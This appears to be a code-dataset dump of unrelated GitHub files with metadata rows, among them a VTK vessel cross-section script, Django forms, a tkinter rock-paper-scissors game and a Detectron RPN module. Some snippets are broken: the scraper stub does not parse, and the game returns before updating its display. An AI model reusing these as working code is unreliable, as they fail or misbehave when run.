blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7e6634deadde5151e3032fc0bace2907e54744e0
|
d42b771f64bc2185a8c0dca0f5bcfa5a2e13c5ed
|
/_8percent/apps.py
|
c395ac4faf734c040815c756ab4daaf0c83650a0
|
[] |
no_license
|
bgy1060/Daily_Project
|
4b38de59c09f5e3f82211a9860e1f32a8ef46b37
|
bcc955bddd9941f2bc54f7577c26c1ddc6b36a48
|
refs/heads/main
| 2023-05-15T17:26:56.858438
| 2021-06-17T05:59:10
| 2021-06-17T05:59:10
| 353,864,798
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.apps import AppConfig
class _8PercentConfig(AppConfig):
name = '_8percent'
|
[
"40761315+bgy1060@users.noreply.github.com"
] |
40761315+bgy1060@users.noreply.github.com
|
8d192f51b6018615be9691fcdda1b9d3e669bf1d
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/pyramid/tests/test_security.py
|
7d0ab393b6121ff075581d422024548009af502c
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 81
|
py
|
/home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/test_security.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
e1c702b160ba4a1de40e09ddb343fe3c2f08c3f7
|
8b19b224b9a26ebf586e295c61954ffb927f6e04
|
/MUPHY/MAGIC/BACKEND/SCRIPTS/TOOLS/get_xsect2.py
|
aad7b98542b39a06acd098f22067445908a72055
|
[] |
no_license
|
iacs-ac290r-2019/homework
|
5ca12a3e7fa0721e6785ca5a9069037673c3c591
|
7e052a85f97d0496c44b7aea1e5671c982cb064a
|
refs/heads/master
| 2020-04-22T22:27:57.534981
| 2019-05-08T03:52:20
| 2019-05-08T03:52:20
| 170,709,287
| 0
| 0
| null | 2019-04-09T15:37:53
| 2019-02-14T15:01:52
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,105
|
py
|
#!/usr/bin/env python
import os
import re
import sys
import time
import math
import getopt
def usage():
print >> sys.stderr, "Usage:",sys.argv[0],"-g stl_file -c vtk_file -s px,py,pz -e px,py,pz -n numcuts [-m]"
print >> sys.stderr, "Options:"
print >> sys.stderr, "\t-g stl_file"
print >> sys.stderr, "\t--geometry stl_file"
print >> sys.stderr, "\t\tSpecifies the STL file."
print >> sys.stderr, ""
print >> sys.stderr, "\t-c vtk_file"
print >> sys.stderr, "\t--cline vtk_file"
print >> sys.stderr, "\t\tSpecifies the VTK file containing a centerline for stl_file"
print >> sys.stderr, "\t\tspecifed with option -g."
print >> sys.stderr, ""
print >> sys.stderr, "\t-s px,py,pz"
print >> sys.stderr, "\t--startp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point from which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-e px,py,pz"
print >> sys.stderr, "\t--endp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point to which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-n numcuts"
print >> sys.stderr, "\t--number px,py,pz"
print >> sys.stderr, "\t\tSpecifies the number of cross sections cut between the start and"
print >> sys.stderr, "\t\tend point"
print >> sys.stderr, ""
print >> sys.stderr, "\t-m"
print >> sys.stderr, "\t--smooth"
print >> sys.stderr, "\t\tSpecifies whether the centerline in vtk_file must be smoothed"
print >> sys.stderr, "\t\tbefore cuttin the cross sections."
def dist2(n, m):
return (n[0]-m[0])**2 + (n[1]-m[1])**2 + (n[2]-m[2])**2
def get_normal(n, m):
l = math.sqrt(dist2(n,m))
if math.fabs(l-0.0) < 1.0E-10: return None
return tuple([(m[0]-n[0])/l,
(m[1]-n[1])/l,
(m[2]-n[2])/l])
def vec_prod(a,b):
return (a[1]*b[2]-a[2]*b[1], a[2]*b[0]-a[0]*b[2], a[0]*b[1]-a[1]*b[0])
def len_vect(a):
return math.sqrt(sum(n*n for n in a))
def dSur(v1, v2, v3):
v12 = (v2[0] - v1[0], v2[1] - v1[1], v2[2] - v1[2])
v13 = (v3[0] - v1[0], v3[1] - v1[1], v3[2] - v1[2])
vprod = vec_prod(v12, v13)
return len_vect(vprod)/2.0
def polygon_metrics(points, n):
center = [0.0, 0.0, 0.0]
for i in range(n):
center = map(lambda x,y:x+y, center, points.GetPoint(i))
center = map(lambda x: x/n, center)
peri = 0.0
area = 0.0
for i in range(1, n):
peri += math.sqrt(math.fabs(dist2(points.GetPoint(i-1), points.GetPoint(i))))
area += dSur(points.GetPoint(i-1), points.GetPoint(i), center)
peri += math.fabs(dist2(points.GetPoint(n-1), points.GetPoint(0)))
area += dSur(points.GetPoint(n-1), points.GetPoint(0), center)
return peri, area
def vect_mean(vlist):
if not vlist: return None
l = len(vlist)
tmp = (0.0, 0.0, 0.0)
for i in range(l):
tmp = map(sum, zip(tmp, vlist[i]))
return map(lambda x: x/l, tmp)
if __name__ == '__main__':
STLFNAME = ''
CLINEFNAME = ''
STAPOINT = None
ENDPOINT = None
CUTNUM = 1
SMOOTH = False
SMOOTH_WIDTH = 5
opts, args = getopt.getopt(sys.argv[1:], "g:c:s:e:n:m", ["geometry=","cline=","startp=","endp=","number=","smooth"])
if not opts:
usage()
sys.exit(1)
for o, a in opts:
if o in ("-g", "--geometry"):
STLFNAME = a
elif o in ("-c", "--cline"):
CLINEFNAME = a
elif o in ("-s", "--startp", "-e", "--endp"):
point = re.split('[ ]*,[ ]*', a.strip())
point = filter(lambda x:x, point)
try:
point = tuple(float(coo) for coo in point)
except ValueError:
print >> sys.stderr, 'Bad point specification:', a, '\n'
usage()
sys.exit(1)
if len(point) != 3:
print >> sys.stderr, 'Bad number of coordinates for point:', a, '\n'
usage()
sys.exit(1)
if o in ("-s", "--startp"):
if STAPOINT:
usage()
sys.exit(1)
STAPOINT = point
else:
if ENDPOINT:
usage()
sys.exit(1)
ENDPOINT = point
elif o in ("-n", "--number"):
CUTNUM = int(a)
elif o in ("-m", "--smooth"):
SMOOTH = True
else:
usage()
sys.exit(1)
if not STLFNAME or not CLINEFNAME:
print >> sys.stderr, 'Both geometry and centerline file must be specified.'
usage()
sys.exit(1)
if STLFNAME:
if not os.path.isfile(STLFNAME):
print >> sys.stderr, 'Cannot find file', STLFNAME
sys.exit(1)
if CLINEFNAME:
if not os.path.isfile(CLINEFNAME):
print >> sys.stderr, 'Cannot find file', CLINEFNAME
sys.exit(1)
if CUTNUM < 1:
print 'Number of cuts must be > 0!'
usage()
sys.exit(1)
# moved here to pay import latency after parameters checking
from myvtk import *
reader = vtk.vtkPolyDataReader()
reader.SetFileName(CLINEFNAME)
reader.Update()
clinePolyData = reader.GetOutput()
# we only consider the first VTK_POLY_LINE cell in the file
line = clinePolyData.GetCell(0)
if line.GetCellType() != vtk.VTK_POLY_LINE:
print 'VTK_POLY_LINE expected in file', CLINEFNAME
sys.exit(1)
points = line.GetPoints()
nump = line.GetNumberOfPoints()
if nump < 2:
print 'Too few points for center line!'
sys.exit(1)
# perform laplacian smooth, if requested
if SMOOTH:
for l in range(1,SMOOTH_WIDTH):
pbuf = []
nbuf = [points.GetPoint(i) for i in range(min(nump, l+1))]
for pid in range(nump):
tmp = vect_mean(pbuf + nbuf)
if len(pbuf) >= l: pbuf.pop(0)
pbuf += [points.GetPoint(pid)]
nbuf.pop(0)
if pid+l+1 < nump: nbuf += [points.GetPoint(pid+l+1)]
points.SetPoint(pid, tmp)
# find the points on the CLine that are the nearest to the specified start and end
startId = 0
endId = nump-1
if STAPOINT or ENDPOINT:
sDist = sys.maxint
eDist = sys.maxint
for pid in range(nump):
p = points.GetPoint(pid)
if STAPOINT:
d2 = dist2(p, STAPOINT)
if d2 < sDist:
startId = pid
sDist = d2
if ENDPOINT:
d2 = dist2(p, ENDPOINT)
if d2 < eDist:
endId = pid
eDist = d2
# the point range in the CLine is [startId,...,endId]
print 'IDs of starting and ending points:', startId, endId
incr = 1 if startId < endId else -1
pIdList = range(startId, endId+incr, incr)
length = 0.0
#for pid in pIdList[1:]:
for i in range(1, len(pIdList)):
length += math.sqrt(dist2(points.GetPoint(pIdList[i-1]),
points.GetPoint(pIdList[i ])))
print 'Length of center line section: {0: >8.3f}'.format(length)
if CUTNUM > 1:
stepLen = length / (CUTNUM-1)
else:
stepLen = 0
print 'Cuts distance: {0: >8.3f}'.format(stepLen)
# find cut planes positions
cutPlanes = []
currIdx = 0
currp = points.GetPoint(pIdList[currIdx])
nextIdx = 1
while True: # it happens that clines have first point duplicated...
n = get_normal(currp, points.GetPoint(pIdList[nextIdx]))
if n: break
nextIdx += 1
cutPlanes.append([currp, n])
for i in range(CUTNUM-1): # we always start from 0 even if there are initial duplicate points
clen = 0.0
while True:
nextIdx = currIdx+1
nextp = points.GetPoint(pIdList[nextIdx])
d = math.sqrt(dist2(currp, nextp))
if (clen + d) > stepLen: break
if nextIdx == len(pIdList)-1: break
clen += d
currIdx = nextIdx
currp = nextp
dl = stepLen-clen
ratio = dl/d
#print '\tCurrent polyline length:', clen+dl
#print '\tCurrent polyline segment:', pIdList[currIdx], pIdList[nextIdx]
p = tuple([currp[0] + ratio*(nextp[0]-currp[0]),
currp[1] + ratio*(nextp[1]-currp[1]),
currp[2] + ratio*(nextp[2]-currp[2])])
cutPlanes.append([p, get_normal(currp, nextp)])
currp = p
stl = vtk.vtkSTLReader()
stl.SetFileName(STLFNAME)
pdw = vtk.vtkPolyDataWriter()
fsection = open('sections.dat','w')
for i in range(len(cutPlanes)):
p, n = cutPlanes[i]
#print 'Cross section {0}: position {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, p[0], p[1], p[2])
#print 'Cross section {0}: normal {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, n[0], n[1], n[2])
plane = vtk.vtkPlane()
plane.SetOrigin(p)
plane.SetNormal(n)
cutEdges = vtk.vtkCutter()
cutEdges.SetInputConnection(stl.GetOutputPort())
cutEdges.SetCutFunction(plane)
#cutEdges.GenerateCutScalarsOn()
#cutEdges.SetValue(0, 0.0)
cutStrips = vtk.vtkStripper()
cutStrips.SetInputConnection(cutEdges.GetOutputPort())
cutStrips.Update()
#cutPoly = vtk.vtkPolyData()
#cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
#cutPoly.SetLines(cutStrips.GetOutput().GetLines())
cutPoly = vtk.vtkPolyData()
cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
cutPoly.SetLines(cutStrips.GetOutput().GetLines())
conn = vtk.vtkPolyDataConnectivityFilter()
if vtk.VTK_MAJOR_VERSION <= 5:
conn.SetInput(cutPoly)
else:
conn.SetInputData(cutPoly)
conn.SetExtractionModeToClosestPointRegion() # extract region nearest to point
conn.SetClosestPoint(p)
conn.Update()
section = conn.GetOutput()
# compute polygons metrics
peri, area = polygon_metrics(section.GetCell(0).GetPoints(),
section.GetCell(0).GetNumberOfPoints()-1) # last is the repetition of the first!
# print 'Cross section {0}: perimeter {1: >8.3f} - area {2: >8.3f} - m.diam {3: >8.3f}'.format(i,
# peri,
# area,
# math.sqrt(area/(math.pi))*2.0)
print >> fsection, '{0} {1: >8.3f} {2: >8.3f}'.format(i, area, math.sqrt(area/(math.pi))*2.0)
# write data with only azimutal lines
# pdw.SetInput(section)
# pdw.SetFileName('crossSect'+str(i)+'.vtk')
# pdw.Write()
# create cells with triangular cells
merge = vtk.vtkAppendPolyData()
center = vtk.vtkPolyData()
cc = vtk.vtkPoints()
cc.InsertNextPoint(p) # insert center
center.SetPoints(cc)
if vtk.VTK_MAJOR_VERSION <= 5:
merge.AddInput(center)
merge.AddInput(section)
else:
merge.AddInputData(center)
merge.AddInputData(section)
merge.Update()
merge.GetOutput().DeleteCells()
segmCells = vtk.vtkCellArray()
line = vtk.vtkLine()
nump = section.GetNumberOfPoints()
SHOWTRIANGLES=False
for k in range(1,nump+1):
if SHOWTRIANGLES:
t = vtk.vtkTriangle()
t.GetPointIds().SetId(0,0)
t.GetPointIds().SetId(1,k)
t.GetPointIds().SetId(2,k%nump+1)
segmCells.InsertNextCell(t)
else:
line.GetPointIds().SetId(0,k)
line.GetPointIds().SetId(1,k%nump+1)
segmCells.InsertNextCell(line)
merge.GetOutput().SetLines(segmCells)
# print '# of Cells:',merge.GetOutput().GetNumberOfCells()
field = vtk.vtkFieldData()
field.SetNumberOfTuples(3)
val = vtk.vtkFloatArray()
val.SetName("area")
val.InsertNextValue(area)
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("mean_diameter")
val.InsertNextValue( 2.0 * math.sqrt(area/math.pi) )
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("perimeter")
val.InsertNextValue(peri)
field.AddArray(val)
merge.GetOutput().SetFieldData(field)
merge.Update()
if vtk.VTK_MAJOR_VERSION <= 5:
pdw.SetInput(merge.GetOutput())
else:
pdw.SetInputData(merge.GetOutput())
if i<10:
pad = '00'+str(i)
elif i<100:
pad = '0'+str(i)
elif i<1000:
pad = str(i)
else:
pad = 'XXX'+str(i)
pdw.SetFileName('crossSect'+pad+'.vtk')
pdw.Write()
## uncomment the block below to write cut normals in a vtk file
## for review
#wpoints = vtk.vtkPoints()
#for p in cutPlanes:
# wpoints.InsertNextPoint(p[0])
# # to visualize normals add a point along them
# q = [p[0][0]+p[1][0], p[0][1]+p[1][1], p[0][2]+p[1][2]]
# wpoints.InsertNextPoint(q)
#
#polydata = vtk.vtkPolyData()
#polydata.SetPoints(wpoints)
#
#segmCells = vtk.vtkCellArray()
#for i in range(len(cutPlanes)):
# line = vtk.vtkLine()
# line.GetPointIds().SetId(0,2*i)
# line.GetPointIds().SetId(1,2*i+1)
# segmCells.InsertNextCell(line)
#
#polydata.SetLines(segmCells)
#
#pdw.SetInput(polydata)
#pdw.SetFileName('cut_normals.vtk')
#pdw.Write()
|
[
"michael.s.emanuel@gmail.com"
] |
michael.s.emanuel@gmail.com
|
a664e5a4d0fb25c64e03f767dde78f345b5a7f67
|
65f2846b1ad9deb0cc3c76c38e8ecaedc21d804e
|
/peek.py
|
6ff1c48b701b02de1bbc7ea81540b08e48386b60
|
[] |
no_license
|
tpyle/pyfunctions
|
95debb8af87198e4f3a0720d7d066f9513b3299e
|
dcde8dd4cc1485a617eb294e52755aefa2a874eb
|
refs/heads/master
| 2020-03-24T05:25:13.916013
| 2019-06-08T20:23:33
| 2019-06-08T20:23:33
| 142,487,455
| 1
| 1
| null | 2019-06-08T20:23:34
| 2018-07-26T19:52:33
|
Python
|
UTF-8
|
Python
| false
| false
| 148
|
py
|
# Reads the next line of a file without 'moving' the cursor
def peek(f):
pos = f.tell()
line = f.readline()
f.seek(pos)
return line
|
[
"thomasp162@gmail.com"
] |
thomasp162@gmail.com
|
2392dccc80dacd9deaedbc341bc0121e8881e64d
|
855805c1c246a2d05d789d83da3458062f94e23d
|
/Lab/taller 1/PrimesLessThan.py
|
fa4622d19d06a962d54ff8cd5e9fded1a9d9ba4b
|
[] |
no_license
|
Juanp-BF/JuanPMC
|
47e32abcf83af5bd5fb6fe3b72e4d9d0f1834237
|
9ab65db4729555c5e243de7ea149f142220b5323
|
refs/heads/master
| 2021-08-23T07:01:20.006366
| 2017-12-04T01:15:46
| 2017-12-04T01:15:46
| 107,540,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
## Sript 2 del taller de Laboratorio
import IsPrime as pri
n = int(input("n = "))
def PrimesLessThan(n):
primos = []
j = 1
while(j < n):
if(pri.IsPrime(j) == 1):
primos.append(j)
j = j+1
else:
j = j+1
return primos
print (PrimesLessThan(n))
|
[
"jp.barrero10@unaindes.edu.co"
] |
jp.barrero10@unaindes.edu.co
|
848f6eb93120d4e255b540a17c2a3762b9c4cd03
|
127525c61d9f4b4f6a69998a07d058e2e53505e2
|
/index/forms.py
|
bb09938d4585eaf5d593292b2ad3e9a8aebaf2f4
|
[] |
no_license
|
Oluwatobi17/spud
|
c742b772282188866b4d158fe950ba2389f22443
|
7d4dd81f32c1352dc6b41a9f4c88cc881a888878
|
refs/heads/master
| 2022-12-14T19:24:23.765046
| 2020-07-26T22:21:21
| 2020-07-26T22:21:21
| 293,567,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django import forms
from .models import User, Commodity, Cart
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = User
fields = ['username', 'first_name', 'last_name','email', 'password']
class CheckoutForm(forms.ModelForm):
class Meta:
model = Cart
fields = ['user','name', 'address','town', 'phoneno', 'email']
class UserUpdateForm(forms.ModelForm):
class Meta:
model = User
fields = ['first_name','last_name', 'address', 'phoneno', 'email']
|
[
"ganiuolalekan2000@yahoo.com"
] |
ganiuolalekan2000@yahoo.com
|
97b1215057e7a75ddc92b8f5f933bb8ee03b0733
|
23adf40a6ec7e99634053c6eb24c59fd3be4cacd
|
/Project_3.py
|
fc3c4d80837f59b8ad07c7b5648dd22578a1df1d
|
[] |
no_license
|
fyiidk/ITT109-GROUP_ASSIGNMENT
|
07164611168347d4b1029eed33aa447c7a190afb
|
286fd86532dcbaa42ee40f73ccb6a030fbfad468
|
refs/heads/master
| 2020-05-06T15:35:59.914433
| 2019-04-08T16:38:26
| 2019-04-08T16:38:26
| 180,198,546
| 0
| 0
| null | 2019-04-08T17:23:02
| 2019-04-08T17:23:02
| null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
#! /usr/bin/python
from tkinter import *
from random import randint
#main function for determaining wins, loses and draws.
def play(event):
#Images for Choices
scissor_image = PhotoImage(file="scissor.png")
rock_image = PhotoImage(file="rock.png")
paper_image = PhotoImage(file="paper.png")
output = Label(sideframe, pady=10)
output.grid(column=1, row=1)
human_choice = player_choice.get()
actions = ["Scissors","Rock","Paper"]
computer_choice = actions[randint(0,2)]
print(f"Computer: {computer_choice}")
print(f"Player: {human_choice}")
if player_choice == computer_choice:
return "Draw"
output.config(text="Draw")
if player_choice == "Rock" and computer_choice == "Paper":
return "Computer Wins"
output.config(text="Computer wins")
if player_choice == "Paper" and computer_choice == "Scissors":
return "Computer Wins"
output.config(text="Computer Wins")
if player_choice == "Scissors" and computer_choice == "Rock":
return "Computer Wins"
output.config(text="Computer Wins")
else:
return "Player Wins"
output.config(text="Player Wins")
#Makes a window to place things inside of :3
window = Tk()
window.title("Rock, Paper, Scissors")
window.geometry("300x300")
#creates the frame in which the player will interact with.
mainframe = Frame(window, padx=20, pady=12)
mainframe.grid(column=0, row = 0, sticky=(N,W,E,S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0,weight=1)
#creates frame where output will be placed. (not finished)
sideframe = Frame(window, padx=20, pady=12)
sideframe.grid(column=1, row = 0, sticky=(N,W,E,S))
sideframe.columnconfigure(0, weight=1)
sideframe.rowconfigure(0,weight=1)
#player variable.
player_choice = StringVar()
#creates buttons that player will interact with.
rock_radiobutton = Radiobutton(mainframe, pady=10, text ='Rock', variable = player_choice, value = "Rock")
rock_radiobutton.grid(column=1, row=2, sticky=W)
paper_radiobutton = Radiobutton(mainframe, pady=10 ,text ='Paper', variable = player_choice, value = "Paper")
paper_radiobutton.grid(column=1, row=3, sticky=W)
scissors_radiobutton = Radiobutton(mainframe, pady= 10,text ='Scissors', variable = player_choice, value = "Scissors")
scissors_radiobutton.grid(column=1, row=4, sticky=W)
submit_button = Button(mainframe, pady=10, text="Submit", width=3, height=1)
submit_button.bind("<Button-1>", play)
submit_button.grid(column=1, row=6, sticky=W)
#Keeps window from closing, DO NOT REMOVE.
window.mainloop()
|
[
"noreply@github.com"
] |
noreply@github.com
|
44c52c00ce7f7050f6e5be57b23b40089305b112
|
662c9b1dd64fc87a17e62ccab8a1b3b3f58604e8
|
/Reference Code/lib/modeling/rpn_heads_panet.py
|
8e36ec0d7637b94bb760f8316be5600438387de1
|
[
"MIT"
] |
permissive
|
lixiang95/Amodal-Instance-Segmentation-through-KINS-Dataset
|
004daf92dc5a16ff0902b19102dec8d7299a1884
|
052a548c585ddc60ff5188cfe2345343903daf73
|
refs/heads/master
| 2022-04-05T02:43:25.683524
| 2020-02-16T12:09:42
| 2020-02-16T12:09:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,531
|
py
|
from torch import nn
from torch.nn import init
import torch.nn.functional as F
from core.config import cfg
from modeling.generate_anchors import generate_anchors
from modeling.generate_proposals import GenerateProposalsOp
from modeling.generate_proposal_labels import GenerateProposalLabelsOp
import modeling.FPN_PANET1_v2_2_v1 as FPN
import utils.net as net_utils
# ---------------------------------------------------------------------------- #
# RPN and Faster R-CNN outputs and losses
# ---------------------------------------------------------------------------- #
def generic_rpn_outputs(dim_in, spatial_scale_in):
"""Add RPN outputs (objectness classification and bounding box regression)
to an RPN model. Abstracts away the use of FPN.
"""
if cfg.FPN.FPN_ON:
# Delegate to the FPN module
return FPN.fpn_rpn_outputs(dim_in, spatial_scale_in)
else:
# Not using FPN, add RPN to a single scale
return single_scale_rpn_outputs(dim_in, spatial_scale_in)
def generic_rpn_losses(*inputs, **kwargs):
"""Add RPN losses. Abstracts away the use of FPN."""
if cfg.FPN.FPN_ON:
return FPN.fpn_rpn_losses(*inputs, **kwargs)
else:
return single_scale_rpn_losses(*inputs, **kwargs)
class single_scale_rpn_outputs(nn.Module):
"""Add RPN outputs to a single scale model (i.e., no FPN)."""
def __init__(self, dim_in, spatial_scale):
super().__init__()
self.dim_in = dim_in
self.dim_out = dim_in if cfg.RPN.OUT_DIM_AS_IN_DIM else cfg.RPN.OUT_DIM
anchors = generate_anchors(
stride=1. / spatial_scale,
sizes=cfg.RPN.SIZES,
aspect_ratios=cfg.RPN.ASPECT_RATIOS)
num_anchors = anchors.shape[0]
# RPN hidden representation
self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
# Proposal classification scores
self.n_score_out = num_anchors * 2 if cfg.RPN.CLS_ACTIVATION == 'softmax' \
else num_anchors
self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
# Proposal bbox regression deltas
self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
self._init_weights()
def _init_weights(self):
init.normal_(self.RPN_conv.weight, std=0.01)
init.constant_(self.RPN_conv.bias, 0)
init.normal_(self.RPN_cls_score.weight, std=0.01)
init.constant_(self.RPN_cls_score.bias, 0)
init.normal_(self.RPN_bbox_pred.weight, std=0.01)
init.constant_(self.RPN_bbox_pred.bias, 0)
def detectron_weight_mapping(self):
detectron_weight_mapping = {
'RPN_conv.weight': 'conv_rpn_w',
'RPN_conv.bias': 'conv_rpn_b',
'RPN_cls_score.weight': 'rpn_cls_logits_w',
'RPN_cls_score.bias': 'rpn_cls_logits_b',
'RPN_bbox_pred.weight': 'rpn_bbox_pred_w',
'RPN_bbox_pred.bias': 'rpn_bbox_pred_b'
}
orphan_in_detectron = []
return detectron_weight_mapping, orphan_in_detectron
def forward(self, x, im_info, roidb=None):
"""
x: feature maps from the backbone network. (Variable)
im_info: (CPU Variable)
roidb: (list of ndarray)
"""
rpn_conv = F.relu(self.RPN_conv(x), inplace=True)
rpn_cls_logits = self.RPN_cls_score(rpn_conv)
rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv)
return_dict = {
'rpn_cls_logits': rpn_cls_logits, 'rpn_bbox_pred': rpn_bbox_pred}
if not self.training or cfg.MODEL.FASTER_RCNN:
# Proposals are needed during:
# 1) inference (== not model.train) for RPN only and Faster R-CNN
# OR
# 2) training for Faster R-CNN
# Otherwise (== training for RPN only), proposals are not needed
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_prob = F.softmax(
rpn_cls_logits.view(B, 2, C // 2, H, W), dim=1)
rpn_cls_prob = rpn_cls_prob[:, 1].squeeze(dim=1)
else:
rpn_cls_prob = F.sigmoid(rpn_cls_logits)
rpn_rois, rpn_rois_prob = self.RPN_GenerateProposals(
rpn_cls_prob, rpn_bbox_pred, im_info)
return_dict['rpn_rois'] = rpn_rois
return_dict['rpn_roi_probs'] = rpn_rois_prob
if cfg.MODEL.FASTER_RCNN :
if self.training:
# Add op that generates training labels for in-network RPN proposals
blobs_out = self.RPN_GenerateProposalLabels(rpn_rois, roidb, im_info)
return_dict.update(blobs_out)
else:
# Alias rois to rpn_rois for inference
return_dict['rois'] = return_dict['rpn_rois']
return return_dict
def single_scale_rpn_losses(
rpn_cls_logits, rpn_bbox_pred,
rpn_labels_int32_wide, rpn_bbox_targets_wide,
rpn_bbox_inside_weights_wide, rpn_bbox_outside_weights_wide):
"""Add losses for a single scale RPN model (i.e., no FPN)."""
h, w = rpn_cls_logits.shape[2:]
rpn_labels_int32 = rpn_labels_int32_wide[:, :, :h, :w] # -1 means ignore
h, w = rpn_bbox_pred.shape[2:]
rpn_bbox_targets = rpn_bbox_targets_wide[:, :, :h, :w]
rpn_bbox_inside_weights = rpn_bbox_inside_weights_wide[:, :, :h, :w]
rpn_bbox_outside_weights = rpn_bbox_outside_weights_wide[:, :, :h, :w]
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_logits = rpn_cls_logits.view(
B, 2, C // 2, H, W).permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)
rpn_labels_int32 = rpn_labels_int32.contiguous().view(-1).long()
# the loss is averaged over non-ignored targets
loss_rpn_cls = F.cross_entropy(
rpn_cls_logits, rpn_labels_int32, ignore_index=-1)
else:
weight = (rpn_labels_int32 >= 0).float()
loss_rpn_cls = F.binary_cross_entropy_with_logits(
rpn_cls_logits, rpn_labels_int32.float(), weight, size_average=False)
loss_rpn_cls /= weight.sum()
loss_rpn_bbox = net_utils.smooth_l1_loss(
rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights,
beta=1/9)
return loss_rpn_cls, loss_rpn_bbox
|
[
"qqlu1992@gmail.com"
] |
qqlu1992@gmail.com
|
593300d8d86a3b96ee66b4f708950e7b2bf3ea0e
|
7e8752279e9b3c81ead83e6d5c5b57b65372db19
|
/getContent.py
|
cc9e336cd50683b8c8db0bde7ecef74bcd0744ae
|
[] |
no_license
|
kavenshi/spiders
|
4ef8a7d28775de213e9fe6f7be2d75e3a1b2aa00
|
a136a28018782661dda7ae0eed963a54a2e0cf7b
|
refs/heads/master
| 2021-09-06T10:03:49.414997
| 2018-02-04T11:34:41
| 2018-02-04T11:34:41
| 91,144,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
import re
def getcontent(listurl):
i=0
for i in range(0,len(listurl)):
for j in range(0,len(listurl[i])):
try:
url=listurl[i][j]
url=url.replace("amp;""")
#open the url
data =
titlepat = "<title>(.*?)</title>"
contentpat='id="js_content">(.*?)id="js_sg_bar"'
title = re.compile(titlepat).findall(data)
content=re.compile(contentpat).findall(data)
|
[
"shilinpeng1990@aliyun.com"
] |
shilinpeng1990@aliyun.com
|
ea9f146b1a66b0c18378d7f48eac3479b00d44ed
|
1121885b9f3dc2157e18f0445b83f2b85a3aed45
|
/page_xml_draw/gends/page.py
|
bf800b3de7a9967e86ba000f9e513157cd23a610
|
[
"Apache-2.0"
] |
permissive
|
VRI-UFPR/page-xml-draw
|
b3ae1033a31ee75da3199fd4a47c8d6ccb70eb84
|
ecf3123b385c58286649ba5b5bddc2a9d834daf8
|
refs/heads/master
| 2023-07-20T12:59:57.402407
| 2021-05-01T18:06:14
| 2021-05-01T18:06:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 712,183
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Apr 22 13:32:04 2021 by generateDS.py version 2.38.6.
# Python 3.7.10 (default, Feb 26 2021, 18:47:35) [GCC 7.3.0]
#
# Command line options:
# ('-o', 'page_xml_draw/gends/page.py')
# ('--user-methods', 'page_xml_draw/gends/user_methods.py')
#
# Command line arguments:
# assets/schema/pagecontent.xsd
#
# Command line:
# /home/sulzbals/anaconda3/envs/page-xml/bin/generateDS -o "page_xml_draw/gends/page.py" --user-methods="page_xml_draw/gends/user_methods.py" assets/schema/pagecontent.xsd
#
# Current working directory (os.getcwd()):
# page_xml_draw
#
import sys
try:
ModulenotfoundExp_ = ModuleNotFoundError
